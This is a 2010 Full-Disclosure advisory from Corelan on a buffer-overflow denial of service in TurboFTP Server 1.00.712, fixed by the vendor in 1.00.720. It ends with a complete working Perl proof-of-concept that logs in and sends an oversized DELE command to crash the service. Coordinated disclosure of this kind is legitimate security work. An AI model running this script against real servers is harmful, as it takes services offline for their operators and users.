[<prev] [next>] [day] [month] [year] [list]
Message-ID: <C0641B79F7D6A44791BA8FA35BC143F90153A1A66DB9@apollo.corelan.be>
Date: Tue, 12 Jan 2010 20:25:54 +0100
From: Security <security@...elan.be>
To: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>,
"secalert@...urityreason.com" <secalert@...urityreason.com>,
"bugtraq@...urityfocus.com" <bugtraq@...urityfocus.com>, "vuln@...unia.com"
<vuln@...unia.com>
Cc: Corelan Team <Corelan.Team@...elan.be>
Subject: [CORELAN-10-004] TurboFTP Server 1.00.712 remote
DoS
|------------------------------------------------------------------|
| __ __ |
| _________ ________ / /___ _____ / /____ ____ _____ ___ |
| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |
| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |
| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |
| |
| http://www.corelan.be:8800 |
| security@...elan.be |
| |
|-------------------------------------------------[ EIP Hunters ]--|
| |
| Vulnerability Disclosure Report |
| |
|------------------------------------------------------------------|
Advisory : CORELAN-10-004
Disclosure date : Jan 12, 2010
Corelan Reference :
http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-004-turboftp-server-1-00-712-dos/
0x00 : Vulnerability information
--------------------------------
[*] Product : Turbo FTP Server
[*] Version : 1.00.712
[*] Vendor : turbosoft inc
[*] URL : http://www.tbsoftinc.com
[*] Platform : Windows
[*] Type of vulnerability : Buffer overflow - DoS
[*] Risk rating : Medium
[*] Issue fixed in version : 1.00.720
[*] Vulnerability discovered by : corelanc0d3r (corelanc0d3r[at]gmail[dot]com)
[*] Greetings to : EdiStrosar, rick2600, mr_me, ekse & MarkoT from Corelan Team
0x01 : Vendor description of software
-------------------------------------
>>From the vendor website:
TurboFTP Server is a high performance, secure, scalable and management
friendly file transfer server running on Windows platforms. With it you
can easily set up a secure file transfer server that delivers regular FTP,
FTP over SSL/TLS, and SFTP over SSH services with virtual domains,
advanced directory access control, virtual folders, IP access control,
flexible authentication options and many other features.
0x02 : Vulnerability details
----------------------------
The "Turbo FTP Server" ftp service is vulnerable to a buffer overflow,
allowing a malicious person to trigger a Denial Of Service condition
against this service.
In order to trigger the vulnerability, the remote client needs to be able
to login and issue an specially crafted DELE command.
Note that other commands may be vulnerable too.
0x03 : Vendor communication
---------------------------
[*] Dec 30, 2009 : Issue found
[*] Jan 1st, 2010 : contacted vendor
[*] Jan 1st, 2010 : vendor opened support ticket
[*] Jan 4th, 2010 : vendor asked for PoC code
[*] Jan 4th, 2010 : Poc Code sent
[*] Jan 7th, 2010 : Vendor acknowledged issue and starts fixing issue
[*] Jan 11th, 2010 : vendor released fixed version
[*] Jan 12th, 2010 : Public disclosure
Release notes (on Vendor website):
V 1.00 Build 720 - Jan 11, 2010
[-] Buffer overflow problems reported by Corelan Team.
[-] A file open problem causing WinSCP failed to upload files.
[-] A problem in log recycling causes server to stall.
0x04 : Exploit/PoC
------------------
# Exploit Title : TurboFTP Server 1.00.712 Remote DoS
# Date : 30 december 2009
# Author : corelanc0d3r (corelanc0d3r[at]gmail{dot}com)
# Bug found by : corelanc0d3r (corelanc0d3r[at]gmail{dot}com)
# Software Link : http://www.tbsoftinc.com/download/tbftpsrv.exe
# Version : 1.00.712
# Issue fixed in: 1.00.720
# OS : Windows
# Tested on : XP SP3 En (VirtualBox)
# Type of vuln : DoS
# Greetz to : Corelan Security Team::EdiStrosar/Ricks2600/MarkoT/mr_me/ekse
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
#
#
# Code :
print "|------------------------------------------------------------------|\n";
print "| __ __ |\n";
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |\n";
print "| / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |\n";
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\n";
print "| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/ |\n";
print "| |\n";
print "| http://www.corelan.be:8800 |\n";
print "| |\n";
print "|-------------------------------------------------[ EIP Hunters ]--|\n\n";
print "[+] DoS exploit for TurboFTP Server 1.00.712 \n";
use IO::Socket;
if ($#ARGV ne 3) {
print "\n usage: $0 <targetip> <targetport> <user> <password>\n";
exit(0);
}
my $user=$ARGV[2];
my $pass=$ARGV[3];
print " [+] Preparing DoS payload\n";
my $payload = "A" x 2000;
print " [+] Connecting to server $ARGV[0] on port $ARGV[1]\n";
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => $ARGV[1],
Proto => 'tcp');
$ftp = <$sock> || die " [!] *** Unable to connect ***\n";
print " ** $ftp";
$ftp = <$sock>;
print " ** $ftp";
print " [+] Logging in (user $user)\n";
print $sock "USER $user\r\n";
$ftp = <$sock>;
print " ** $ftp";
print $sock "PASS $pass\r\n";
$ftp = <$sock>;
print " ** $ftp";
print " [+] Sending payload\n";
print $sock "DELE ".$payload."\r\n";
$ftp = <$sock>;
print " ** $ftp";
print " [+] Payload sent, now checking FTP server state\n";
$sock2 = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => $ARGV[1],
Proto => 'tcp');
my $ftp2 = <$sock2> || die " [+] DoS successful\n";
print " [!] DoS did not seem to work\n";
print " ** $ftp2\n";
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists